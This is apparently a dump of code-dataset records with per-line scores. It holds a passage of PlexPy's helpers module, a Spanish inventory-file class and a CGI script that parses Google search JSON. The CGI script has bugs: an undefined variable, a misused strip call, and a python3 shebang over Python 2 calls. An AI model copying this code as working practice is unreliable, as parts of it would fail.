= match.group("thread") message = match.group("message") return (timestamp, level, thread, message) else: return None def split_string(mystring, splitvar=','): mylist = [] for each_word in mystring.split(splitvar): mylist.append(each_word.strip()) return mylist def create_https_certificates(ssl_cert, ssl_key): """ Create a pair of self-signed HTTPS certificares and store in them in 'ssl_cert' and 'ssl_key'. Method assumes pyOpenSSL is installed. This code is stolen from SickBeard (http://github.com/midgetspy/Sick-Beard). """ from plexpy import logger from OpenSSL import crypto from certgen import createKeyPair, createCertRequest, createCertificate, \ TYPE_RSA, serial # Create the CA Certificate cakey = createKeyPair(TYPE_RSA, 2048) careq = createCertRequest(cakey, CN="Certificate Authority") cacert = createCertificate(careq, (careq, cakey), serial, (0, 60 * 60 * 24 * 365 * 10)) # ten years pkey = createKeyPair(TYPE_RSA, 2048) req = createCertRequest(pkey, CN="PlexPy") cert = createCertificate(req, (cacert, cakey), serial, (0, 60 * 60 * 24 * 365 * 10)) # ten years # Save the key and certificate to disk try: with open(ssl_key, "w") as fp: fp.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, pkey)) with open(ssl_cert, "w") as fp: fp.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert)) except IOError as e: logger.error("Error creating SSL key and certificate: %s", e) return False return True def cast_to_int(s): try: return int(s) except ValueError: return -1 def cast_to_float(s): try: return float(s) except ValueError: return -1 def convert_xml_to_json(xml): o = xmltodict.parse(xml) return json.dumps(o) def convert_xml_to_dict(xml): o = xmltodict.parse(xml) return o def get_percent(value1, value2): if str(value1).isdigit() and str(value2).isdigit(): value1 = cast_to_float(value1) value2 = cast_to_float(value2) else: return 0 if value1 != 0 and value2 != 0: percent = (value1 / value2) * 100 else: percent = 0 return math.trunc(percent) def parse_xml(unparsed=None): from plexpy import logger if unparsed: try: xml_parse = minidom.parseString(unparsed) return xml_parse except Exception, e: logger.warn("Error parsing XML. %s" % e) return [] except: logger.warn("Error parsing XML.") return [] else: logger.warn("XML parse request made but no data received.") return [] """ Validate xml keys to make sure they exist and return their attribute value, return blank value is none found """ def get_xml_attr(xml_key, attribute, return_bool=False, default_return=''): if xml_key.getAttribute(attribute): if return_bool: return True else: return xml_key.getAttribute(attribute) else: if return_bool: return False else: return default_return def process_json_kwargs(json_kwargs): params = {} if json_kwargs: params = json.loads(json_kwargs) return params def sanitize(string): if string: return unicode(string).replace('<','&lt;').replace('>','&gt;') else: return ''
[ "# This file is part of PlexPy.\n", "#\n", "# PlexPy is free software: you can redistribute it and/or modify\n", "# it under the terms of the GNU General Public License as published by\n", "# the Free Software Foundation, either version 3 of the License, or\n", "# (at your option) any later version.\n", "#\n", "# PlexPy is distributed in the hope that it will be useful,\n", "# but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "# GNU General Public License for more details.\n", "#\n", "# You should have received a copy of the GNU General Public License\n", "# along with PlexPy. If not, see <http://www.gnu.org/licenses/>.\n", "\n", "from operator import itemgetter\n", "from xml.dom import minidom\n", "\n", "import unicodedata\n", "import plexpy\n", "import datetime\n", "import fnmatch\n", "import shutil\n", "import time\n", "import sys\n", "import re\n", "import os\n", "import json\n", "import xmltodict\n", "import math\n", "\n", "\n", "def multikeysort(items, columns):\n", " comparers = [((itemgetter(col[1:].strip()), -1) if col.startswith('-') else (itemgetter(col.strip()), 1)) for col in columns]\n", "\n", " def comparer(left, right):\n", " for fn, mult in comparers:\n", " result = cmp(fn(left), fn(right))\n", " if result:\n", " return mult * result\n", " else:\n", " return 0\n", "\n", " return sorted(items, cmp=comparer)\n", "\n", "\n", "def checked(variable):\n", " if variable:\n", " return 'Checked'\n", " else:\n", " return ''\n", "\n", "\n", "def radio(variable, pos):\n", "\n", " if variable == pos:\n", " return 'Checked'\n", " else:\n", " return ''\n", "\n", "\n", "def latinToAscii(unicrap):\n", " \"\"\"\n", " From couch potato\n", " \"\"\"\n", " xlate = {\n", " 0xc0: 'A', 0xc1: 'A', 0xc2: 'A', 0xc3: 'A', 0xc4: 'A', 0xc5: 'A',\n", " 0xc6: 'Ae', 0xc7: 'C',\n", " 0xc8: 'E', 0xc9: 'E', 0xca: 'E', 0xcb: 'E', 0x86: 'e',\n", " 0xcc: 'I', 0xcd: 'I', 0xce: 'I', 0xcf: 'I',\n", " 0xd0: 'Th', 0xd1: 'N',\n", " 0xd2: 'O', 0xd3: 'O', 0xd4: 'O', 0xd5: 'O', 0xd6: 'O', 0xd8: 'O',\n", " 0xd9: 'U', 0xda: 'U', 0xdb: 'U', 0xdc: 'U',\n", " 0xdd: 'Y', 0xde: 'th', 0xdf: 'ss',\n", " 0xe0: 'a', 0xe1: 'a', 0xe2: 'a', 0xe3: 'a', 0xe4: 'a', 0xe5: 'a',\n", " 0xe6: 'ae', 0xe7: 'c',\n", " 0xe8: 'e', 0xe9: 'e', 0xea: 'e', 0xeb: 'e', 0x0259: 'e',\n", " 0xec: 'i', 0xed: 'i', 0xee: 'i', 0xef: 'i',\n", " 0xf0: 'th', 0xf1: 'n',\n", " 0xf2: 'o', 0xf3: 'o', 0xf4: 'o', 0xf5: 'o', 0xf6: 'o', 0xf8: 'o',\n", " 0xf9: 'u', 0xfa: 'u', 0xfb: 'u', 0xfc: 'u',\n", " 0xfd: 'y', 0xfe: 'th', 0xff: 'y',\n", " 0xa1: '!', 0xa2: '{cent}', 0xa3: '{pound}', 0xa4: '{currency}',\n", " 0xa5: '{yen}', 0xa6: '|', 0xa7: '{section}', 0xa8: '{umlaut}',\n", " 0xa9: '{C}', 0xaa: '{^a}', 0xab: '&lt;&lt;', 0xac: '{not}',\n", " 0xad: '-', 0xae: '{R}', 0xaf: '_', 0xb0: '{degrees}',\n", " 0xb1: '{+/-}', 0xb2: '{^2}', 0xb3: '{^3}', 0xb4: \"'\",\n", " 0xb5: '{micro}', 0xb6: '{paragraph}', 0xb7: '*', 0xb8: '{cedilla}',\n", " 0xb9: '{^1}', 0xba: '{^o}', 0xbb: '&gt;&gt;',\n", " 0xbc: '{1/4}', 0xbd: '{1/2}', 0xbe: '{3/4}', 0xbf: '?',\n", " 0xd7: '*', 0xf7: '/'\n", " }\n", "\n", " r = ''\n", " if unicrap:\n", " for i in unicrap:\n", " if ord(i) in xlate:\n", " r += xlate[ord(i)]\n", " elif ord(i) >= 0x80:\n", " pass\n", " else:\n", " r += str(i)\n", "\n", " return r\n", "\n", "\n", "def convert_milliseconds(ms):\n", "\n", " seconds = ms / 1000\n", " gmtime = time.gmtime(seconds)\n", " if seconds > 3600:\n", " minutes = time.strftime(\"%H:%M:%S\", gmtime)\n", " else:\n", " minutes = time.strftime(\"%M:%S\", gmtime)\n", "\n", " return minutes\n", "\n", "def convert_milliseconds_to_minutes(ms):\n", "\n", " if str(ms).isdigit():\n", " seconds = float(ms) / 1000\n", " minutes = round(seconds / 60, 0)\n", "\n", " return math.trunc(minutes)\n", "\n", " return 0\n", "\n", "def convert_seconds(s):\n", "\n", " gmtime = time.gmtime(s)\n", " if s > 3600:\n", " minutes = time.strftime(\"%H:%M:%S\", gmtime)\n", " else:\n", " minutes = time.strftime(\"%M:%S\", gmtime)\n", "\n", " return minutes\n", "\n", "\n", "def today():\n", " today = datetime.date.today()\n", " yyyymmdd = datetime.date.isoformat(today)\n", " return yyyymmdd\n", "\n", "\n", "def now():\n", " now = datetime.datetime.now()\n", " return now.strftime(\"%Y-%m-%d %H:%M:%S\")\n", "\n", "def human_duration(s, sig='dhms'):\n", "\n", " hd = ''\n", "\n", " if str(s).isdigit() and s > 0:\n", " d = int(s / 84600)\n", " h = int((s % 84600) / 3600)\n", " m = int(((s % 84600) % 3600) / 60)\n", " s = int(((s % 84600) % 3600) % 60)\n", "\n", " hd_list = []\n", " if sig >= 'd' and d > 0:\n", " d = d + 1 if sig == 'd' and h >= 12 else d\n", " hd_list.append(str(d) + ' days')\n", "\n", " if sig >= 'dh' and h > 0:\n", " h = h + 1 if sig == 'dh' and m >= 30 else h\n", " hd_list.append(str(h) + ' hrs')\n", " \n", " if sig >= 'dhm' and m > 0:\n", " m = m + 1 if sig == 'dhm' and s >= 30 else m\n", " hd_list.append(str(m) + ' mins')\n", "\n", " if sig >= 'dhms' and s > 0:\n", " hd_list.append(str(s) + ' secs')\n", "\n", " hd = ' '.join(hd_list)\n", " else:\n", " hd = '0'\n", "\n", " return hd\n", "\n", "def get_age(date):\n", "\n", " try:\n", " split_date = date.split('-')\n", " except:\n", " return False\n", "\n", " try:\n", " days_old = int(split_date[0]) * 365 + int(split_date[1]) * 30 + int(split_date[2])\n", " except IndexError:\n", " days_old = False\n", "\n", " return days_old\n", "\n", "\n", "def bytes_to_mb(bytes):\n", "\n", " mb = int(bytes) / 1048576\n", " size = '%.1f MB' % mb\n", " return size\n", "\n", "\n", "def mb_to_bytes(mb_str):\n", " result = re.search('^(\\d+(?:\\.\\d+)?)\\s?(?:mb)?', mb_str, flags=re.I)\n", " if result:\n", " return int(float(result.group(1)) * 1048576)\n", "\n", "\n", "def piratesize(size):\n", " split = size.split(\" \")\n", " factor = float(split[0])\n", " unit = split[1].upper()\n", "\n", " if unit == 'MiB':\n", " size = factor * 1048576\n", " elif unit == 'MB':\n", " size = factor * 1000000\n", " elif unit == 'GiB':\n", " size = factor * 1073741824\n", " elif unit == 'GB':\n", " size = factor * 1000000000\n", " elif unit == 'KiB':\n", " size = factor * 1024\n", " elif unit == 'KB':\n", " size = factor * 1000\n", " elif unit == \"B\":\n", " size = factor\n", " else:\n", " size = 0\n", "\n", " return size\n", "\n", "\n", "def replace_all(text, dic, normalize=False):\n", "\n", " if not text:\n", " return ''\n", "\n", " for i, j in dic.iteritems():\n", " if normalize:\n", " try:\n", " if sys.platform == 'darwin':\n", " j = unicodedata.normalize('NFD', j)\n", " else:\n", " j = unicodedata.normalize('NFC', j)\n", " except TypeError:\n", " j = unicodedata.normalize('NFC', j.decode(plexpy.SYS_ENCODING, 'replace'))\n", " text = text.replace(i, j)\n", " return text\n", "\n", "\n", "def replace_illegal_chars(string, type=\"file\"):\n", " if type == \"file\":\n", " string = re.sub('[\\?\"*:|<>/]', '_', string)\n", " if type == \"folder\":\n", " string = re.sub('[:\\?<>\"|]', '_', string)\n", "\n", " return string\n", "\n", "\n", "def cleanName(string):\n", "\n", " pass1 = latinToAscii(string).lower()\n", " out_string = re.sub('[\\.\\-\\/\\!\\@\\#\\$\\%\\^\\&\\*\\(\\)\\+\\-\\\"\\'\\,\\;\\:\\[\\]\\{\\}\\<\\>\\=\\_]', '', pass1).encode('utf-8')\n", "\n", " return out_string\n", "\n", "\n", "def cleanTitle(title):\n", "\n", " title = re.sub('[\\.\\-\\/\\_]', ' ', title).lower()\n", "\n", " # Strip out extra whitespace\n", " title = ' '.join(title.split())\n", "\n", " title = title.title()\n", "\n", " return title\n", "\n", "\n", "def split_path(f):\n", " \"\"\"\n", " Split a path into components, starting with the drive letter (if any). Given\n", " a path, os.path.join(*split_path(f)) should be path equal to f.\n", " \"\"\"\n", "\n", " components = []\n", " drive, path = os.path.splitdrive(f)\n", "\n", " # Strip the folder from the path, iterate until nothing is left\n", " while True:\n", " path, folder = os.path.split(path)\n", "\n", " if folder:\n", " components.append(folder)\n", " else:\n", " if path:\n", " components.append(path)\n", "\n", " break\n", "\n", " # Append the drive (if any)\n", " if drive:\n", " components.append(drive)\n", "\n", " # Reverse components\n", " components.reverse()\n", "\n", " # Done\n", " return components\n", "\n", "\n", "def extract_logline(s):\n", " # Default log format\n", " pattern = re.compile(r'(?P<timestamp>.*?)\\s\\-\\s(?P<level>.*?)\\s*\\:\\:\\s(?P<thread>.*?)\\s\\:\\s(?P<message>.*)', re.VERBOSE)\n", " match = pattern.match(s)\n", " if match:\n", " timestamp = match.group(\"timestamp\")\n", " level = match.group(\"level\")\n", " thread = match.group(\"thread\")\n", " message = match.group(\"message\")\n", " return (timestamp, level, thread, message)\n", " else:\n", " return None\n", "\n", "\n", "def split_string(mystring, splitvar=','):\n", " mylist = []\n", " for each_word in mystring.split(splitvar):\n", " mylist.append(each_word.strip())\n", " return mylist\n", "\n", "def create_https_certificates(ssl_cert, ssl_key):\n", " \"\"\"\n", " Create a pair of self-signed HTTPS certificares and store in them in\n", " 'ssl_cert' and 'ssl_key'. Method assumes pyOpenSSL is installed.\n", "\n", " This code is stolen from SickBeard (http://github.com/midgetspy/Sick-Beard).\n", " \"\"\"\n", "\n", " from plexpy import logger\n", "\n", " from OpenSSL import crypto\n", " from certgen import createKeyPair, createCertRequest, createCertificate, \\\n", " TYPE_RSA, serial\n", "\n", " # Create the CA Certificate\n", " cakey = createKeyPair(TYPE_RSA, 2048)\n", " careq = createCertRequest(cakey, CN=\"Certificate Authority\")\n", " cacert = createCertificate(careq, (careq, cakey), serial, (0, 60 * 60 * 24 * 365 * 10)) # ten years\n", "\n", " pkey = createKeyPair(TYPE_RSA, 2048)\n", " req = createCertRequest(pkey, CN=\"PlexPy\")\n", " cert = createCertificate(req, (cacert, cakey), serial, (0, 60 * 60 * 24 * 365 * 10)) # ten years\n", "\n", " # Save the key and certificate to disk\n", " try:\n", " with open(ssl_key, \"w\") as fp:\n", " fp.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, pkey))\n", " with open(ssl_cert, \"w\") as fp:\n", " fp.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))\n", " except IOError as e:\n", " logger.error(\"Error creating SSL key and certificate: %s\", e)\n", " return False\n", "\n", " return True\n", "\n", "\n", "def cast_to_int(s):\n", " try:\n", " return int(s)\n", " except ValueError:\n", " return -1\n", "\n", "def cast_to_float(s):\n", " try:\n", " return float(s)\n", " except ValueError:\n", " return -1\n", "\n", "def convert_xml_to_json(xml):\n", " o = xmltodict.parse(xml)\n", " return json.dumps(o)\n", "\n", "\n", "def convert_xml_to_dict(xml):\n", " o = xmltodict.parse(xml)\n", " return o\n", "\n", "\n", "def get_percent(value1, value2):\n", "\n", " if str(value1).isdigit() and str(value2).isdigit():\n", " value1 = cast_to_float(value1)\n", " value2 = cast_to_float(value2)\n", " else:\n", " return 0\n", "\n", " if value1 != 0 and value2 != 0:\n", " percent = (value1 / value2) * 100\n", " else:\n", " percent = 0\n", "\n", " return math.trunc(percent)\n", "\n", "def parse_xml(unparsed=None):\n", " from plexpy import logger\n", "\n", " if unparsed:\n", " try:\n", " xml_parse = minidom.parseString(unparsed)\n", " return xml_parse\n", " except Exception, e:\n", " logger.warn(\"Error parsing XML. %s\" % e)\n", " return []\n", " except:\n", " logger.warn(\"Error parsing XML.\")\n", " return []\n", " else:\n", " logger.warn(\"XML parse request made but no data received.\")\n", " return []\n", "\n", "\"\"\"\n", "Validate xml keys to make sure they exist and return their attribute value, return blank value is none found\n", "\"\"\"\n", "def get_xml_attr(xml_key, attribute, return_bool=False, default_return=''):\n", " if xml_key.getAttribute(attribute):\n", " if return_bool:\n", " return True\n", " else:\n", " return xml_key.getAttribute(attribute)\n", " else:\n", " if return_bool:\n", " return False\n", " else:\n", " return default_return\n", "\n", "def process_json_kwargs(json_kwargs):\n", " params = {}\n", " if json_kwargs:\n", " params = json.loads(json_kwargs)\n", "\n", " return params\n", "\n", "def sanitize(string):\n", " if string:\n", " return unicode(string).replace('<','&lt;').replace('>','&gt;')\n", " else:\n", " return ''" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.007692307692307693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.024390243902439025, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02857142857142857, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07692307692307693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.05263157894736842, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.0547945205479452, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0.02, 0, 0, 0, 0, 0, 0, 0, 0.23893805309734514, 0, 0, 0, 0, 0, 0, 0.07547169811320754, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0, 0.019801980198019802, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0, 0, 0, 0.03333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0, 0, 0.25, 0.009174311926605505, 0, 0.013157894736842105, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02631578947368421, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0.028169014084507043, 0, 0.058823529411764705 ]
449
0.003214
false
from PUtils import showMessageBox class PArchivos(object): """Clase para Manejo de Archivos y Diccionarios""" _nombreArchivo = '' _dic = {} def __init__(self, nombreArchivo): """Inicializa la clase con el nombre del archivo a utilizar""" self._nombreArchivo = nombreArchivo def existeArticulo(self,KeyID): """funcion que verifica si existe un articulo en el diccionario por la llave""" if len(self._dic) != 0: if KeyID in self._dic: return True else: return False else: return False def searchArticulo(self,KeyID): """funcion que devuelve la descipcion de una llave en el diccionario""" if self.existeArticulo(KeyID): return self._dic[KeyID][0] else: return "Articulo no se encuentra Registrado" def getCArticulo(self,KeyID): """funcion que devuelve la cantidad de una llave en el diccionario de articulos""" if self.existeArticulo(KeyID): return int(self._dic[KeyID][1]) else: return 0 def getCInventario(self,KeyID): """funcion que devuelve la cantidad de una llave en el diccionario de inventario""" if self.existeArticulo(KeyID): return int(self._dic[KeyID][0]) else: return 0 def existeInventario(self,KeyID): """funcion que verifica si existe un articulo en el diccionario por la llave""" return self.existeArticulo(KeyID) def addArticulo(self,KeyID,Descripcion,Cantidad,Activo): """funcion que agrega un articulo al diccionario de articulos""" if self.existeArticulo(KeyID) == False: self._dic[KeyID]=[Descripcion,Cantidad,Activo] def addDiff(self,KeyID,Cantidad): """funcion que agrega un articulo al diccionario de diferencias""" self.addInventario(KeyID,Cantidad) def addInventario(self,KeyID,Cantidad): """funcion que agrega un articulo al diccionario de inventario""" if self.existeInventario(KeyID) == False: self._dic[KeyID]=[Cantidad] def delArticulo(self,KeyID): """funcion que remueve un articulo al diccionario de articulos""" if self.existeArticulo(KeyID) == True: del self._dic[KeyID] def delInventario(self,KeyID): """funcion que remueve un articulo al diccionario de inventario""" self.delArticulo(KeyID) def diffInventario(self,inventarioDic,articulosDic): """funcion que calcula las diferencias entre el diccionario de datos de articulos y de inventario""" self._dic = {} for key in sorted(inventarioDic.getDiccionario()): diff = inventarioDic.getCInventario(key) - articulosDic.getCArticulo(key) self.addDiff(key,diff) for key in sorted(articulosDic.getDiccionario()): if inventarioDic.existeInventario(key) == False: diff = inventarioDic.getCInventario(key) - articulosDic.getCArticulo(key) self.addDiff(key,diff) def saveFile(self): """Funcion que escribe un diccionario de datos a un archivo de texto""" try: archivo = open(self._nombreArchivo, "wt") for key in sorted(self._dic): if len(self._dic[key]) == 3: archivo.write("{0}:{1},{2},{3}\n".format(key,self._dic[key][0],self._dic[key][1],self._dic[key][2])) else: archivo.write("{0}:{1}\n".format(key,self._dic[key][0])) archivo.close() showMessageBox("Exportar Archivo","Archivo {0} Exportado con Exito".format(self._nombreArchivo)) except: showMessageBox("Exportar Archivo","Error al Guardar Archivo {0}".format(self._nombreArchivo)) def loadFile(self): """Funcion que lee de un archivo de texto y rellena un diccionario de datos""" try: archivo = open(self._nombreArchivo, "rt") self._dic = {} while True: linea = archivo.readline() if not linea: break linea = linea[:-1] key, lista = linea.split(":") if lista.strip() == "": listaF = [] else: listaF = lista.split(",") if len(listaF) == 3: self.addArticulo(key,listaF[0],listaF[1],listaF[2]) else: self.addInventario(key,listaF[0]) except: showMessageBox("Importar Archivo","Error al Cargar Archivo {0}".format(self._nombreArchivo)) def getDiccionario(self): """Funcion que devuelve el diccionario de datos de la clase""" dict = self._dic return dict
[ "from PUtils import showMessageBox\n", "\n", "class PArchivos(object):\n", " \"\"\"Clase para Manejo de Archivos y Diccionarios\"\"\"\n", " _nombreArchivo = ''\n", " _dic = {}\n", "\n", " def __init__(self, nombreArchivo):\n", " \"\"\"Inicializa la clase con el nombre del archivo a utilizar\"\"\"\n", " self._nombreArchivo = nombreArchivo\n", "\n", " def existeArticulo(self,KeyID):\n", " \"\"\"funcion que verifica si existe un articulo en el diccionario por la llave\"\"\"\n", " if len(self._dic) != 0:\n", " if KeyID in self._dic:\n", " return True\n", " else:\n", " return False\n", " else:\n", " return False\n", "\n", " def searchArticulo(self,KeyID):\n", " \"\"\"funcion que devuelve la descipcion de una llave en el diccionario\"\"\"\n", " if self.existeArticulo(KeyID):\n", " return self._dic[KeyID][0]\n", " else:\n", " return \"Articulo no se encuentra Registrado\"\n", "\n", " def getCArticulo(self,KeyID):\n", " \"\"\"funcion que devuelve la cantidad de una llave en el diccionario de articulos\"\"\"\n", " if self.existeArticulo(KeyID):\n", " return int(self._dic[KeyID][1])\n", " else:\n", " return 0\n", "\n", " def getCInventario(self,KeyID):\n", " \"\"\"funcion que devuelve la cantidad de una llave en el diccionario de inventario\"\"\"\n", " if self.existeArticulo(KeyID):\n", " return int(self._dic[KeyID][0])\n", " else:\n", " return 0\n", "\n", " def existeInventario(self,KeyID):\n", " \"\"\"funcion que verifica si existe un articulo en el diccionario por la llave\"\"\"\n", " return self.existeArticulo(KeyID)\n", "\n", " def addArticulo(self,KeyID,Descripcion,Cantidad,Activo):\n", " \"\"\"funcion que agrega un articulo al diccionario de articulos\"\"\"\n", " if self.existeArticulo(KeyID) == False:\n", " self._dic[KeyID]=[Descripcion,Cantidad,Activo]\n", "\n", " def addDiff(self,KeyID,Cantidad):\n", " \"\"\"funcion que agrega un articulo al diccionario de diferencias\"\"\"\n", " self.addInventario(KeyID,Cantidad)\n", "\n", " def addInventario(self,KeyID,Cantidad):\n", " \"\"\"funcion que agrega un articulo al diccionario de inventario\"\"\"\n", " if self.existeInventario(KeyID) == False:\n", " self._dic[KeyID]=[Cantidad]\n", "\n", " def delArticulo(self,KeyID):\n", " \"\"\"funcion que remueve un articulo al diccionario de articulos\"\"\"\n", " if self.existeArticulo(KeyID) == True:\n", " del self._dic[KeyID]\n", "\n", " def delInventario(self,KeyID):\n", " \"\"\"funcion que remueve un articulo al diccionario de inventario\"\"\"\n", " self.delArticulo(KeyID)\n", "\n", " def diffInventario(self,inventarioDic,articulosDic):\n", " \"\"\"funcion que calcula las diferencias entre el diccionario de \n", " datos de articulos y de inventario\"\"\"\n", " self._dic = {}\n", " for key in sorted(inventarioDic.getDiccionario()):\n", " diff = inventarioDic.getCInventario(key) - articulosDic.getCArticulo(key)\n", " self.addDiff(key,diff)\n", "\n", " for key in sorted(articulosDic.getDiccionario()):\n", " if inventarioDic.existeInventario(key) == False:\n", " diff = inventarioDic.getCInventario(key) - articulosDic.getCArticulo(key)\n", " self.addDiff(key,diff)\n", "\n", " def saveFile(self):\n", " \"\"\"Funcion que escribe un diccionario de datos a un archivo de texto\"\"\"\n", " try:\n", " archivo = open(self._nombreArchivo, \"wt\") \n", " for key in sorted(self._dic):\n", " if len(self._dic[key]) == 3:\n", " archivo.write(\"{0}:{1},{2},{3}\\n\".format(key,self._dic[key][0],self._dic[key][1],self._dic[key][2]))\n", " else:\n", " archivo.write(\"{0}:{1}\\n\".format(key,self._dic[key][0]))\n", " archivo.close()\n", " showMessageBox(\"Exportar Archivo\",\"Archivo {0} Exportado con Exito\".format(self._nombreArchivo))\n", " except:\n", " showMessageBox(\"Exportar Archivo\",\"Error al Guardar Archivo {0}\".format(self._nombreArchivo))\n", "\n", " def loadFile(self):\n", " \"\"\"Funcion que lee de un archivo de texto y rellena un diccionario de datos\"\"\"\n", " try:\n", " archivo = open(self._nombreArchivo, \"rt\") \n", " self._dic = {}\n", " while True: \n", " linea = archivo.readline() \n", " if not linea: \n", " break \n", " linea = linea[:-1] \n", " key, lista = linea.split(\":\")\n", " if lista.strip() == \"\":\n", " listaF = []\n", " else: \n", " listaF = lista.split(\",\")\n", " if len(listaF) == 3:\n", " self.addArticulo(key,listaF[0],listaF[1],listaF[2])\n", " else:\n", " self.addInventario(key,listaF[0])\n", " except:\n", " showMessageBox(\"Importar Archivo\",\"Error al Cargar Archivo {0}\".format(self._nombreArchivo))\n", "\n", " def getDiccionario(self):\n", " \"\"\"Funcion que devuelve el diccionario de datos de la clase\"\"\"\n", " dict = self._dic\n", " return dict\n", "\n" ]
[ 0, 0, 0.04, 0, 0, 0, 0, 0, 0, 0, 0, 0.027777777777777776, 0.011363636363636364, 0, 0, 0, 0, 0, 0, 0, 0, 0.027777777777777776, 0, 0, 0, 0, 0, 0, 0.029411764705882353, 0.01098901098901099, 0, 0, 0, 0, 0, 0.027777777777777776, 0.010869565217391304, 0, 0, 0, 0, 0, 0.02631578947368421, 0.011363636363636364, 0, 0, 0.06557377049180328, 0, 0.020833333333333332, 0.05084745762711865, 0, 0.05263157894736842, 0, 0.023255813953488372, 0, 0.045454545454545456, 0, 0.02, 0.025, 0, 0.030303030303030304, 0, 0.02127659574468085, 0, 0, 0.02857142857142857, 0, 0, 0, 0.03508771929824561, 0.013888888888888888, 0, 0, 0, 0.011627906976744186, 0.02857142857142857, 0, 0, 0.01639344262295082, 0.011111111111111112, 0.02564102564102564, 0, 0, 0, 0, 0.01818181818181818, 0, 0, 0.03305785123966942, 0, 0.012987012987012988, 0, 0.01834862385321101, 0.0625, 0.018867924528301886, 0, 0, 0.011494252873563218, 0, 0.01818181818181818, 0, 0.04, 0.022727272727272728, 0.03225806451612903, 0.037037037037037035, 0.027777777777777776, 0, 0, 0, 0.041666666666666664, 0, 0, 0.041666666666666664, 0, 0.018518518518518517, 0.0625, 0.01904761904761905, 0, 0, 0, 0, 0, 1 ]
123
0.01859
false
#! /usr/local/bin/python3 import cgitb cgitb.enable() import sys import cgi import urllib import os, sys, inspect # realpath() with make your script run, even if you symlink it :) cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0])) if cmd_folder not in sys.path: sys.path.insert(0, cmd_folder) # use this if you want to include modules from a subforder cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"subfolder"))) if cmd_subfolder not in sys.path: sys.path.insert(0, cmd_subfolder) import yate import mainmodel import markup ####################SINGLE QUERY ########################################## def jsonPaserForOnePage(each_json): titles = [] contents = [] urls = [] ####### each JSON means each page result in a JSON for result in each_json['responseData']['results']: temp_title = urllib.unquote(result['titleNoFormatting']).encode('utf-8') titles.append(temp_title) temp_content = result['content'].encode('utf-8').strip("<b>...</b>").replace("<b>",'').replace("</b>",'').replace("&#39;","'").strip() contents.append(temp_content) temp_url = urllib.unquote(result['unescapedUrl']).encode('utf-8') urls.append(temp_url) return titles, contents, urls def each_jsonPaser(each_json): all_result = [] for result in each_json['responseData']['results']: each_result = [] temp_title = urllib.unquote(result['titleNoFormatting']).encode('utf-8') each_result.append(temp_title) temp_content = result['content'].encode('utf-8').strip("<b>...</b>").replace("<b>",'').replace("</b>",'').replace("&#39;","'").strip() each_result.append(temp_content) temp_url = urllib.unquote(result['unescapedUrl']).encode('utf-8') each_result.append(temp_url) all_result.append(each_result) return all_result def each_jsonPaserUsingDic(each_json): all_result = {} for result in each_json['responseData']['results']: temp_title = urllib.unquote(result['titleNoFormatting']).encode('utf-8') all_result['title'] = temp_title each_result.append(temp_title) temp_content = result['content'].encode('utf-8').strip("<b>...</b>").replace("<b>",'').replace("</b>",'').replace("&#39;","'").strip() each_result.append(temp_content) temp_url = urllib.unquote(result['unescapedUrl']).encode('utf-8') each_result.append(temp_url) all_result.append(each_result) return all_result ########## MULTIPLE query ######################## ####### controller process #############3 form_data = cgi.FieldStorage() term = form_data['terms'].value # "results" are the JSONs list containing each page result FOR ONE QUERY [[ONE PAGE - title,content,url],[ONE PAGE - JSON]] results = mainmodel.get_googleResult_from_firstQuery(term) #for each in results: # fordiaply = each_jsonPaser(each) for each in results: onePageTitles,onePageContents,onePageUrls = jsonPaserForOnePage(each) 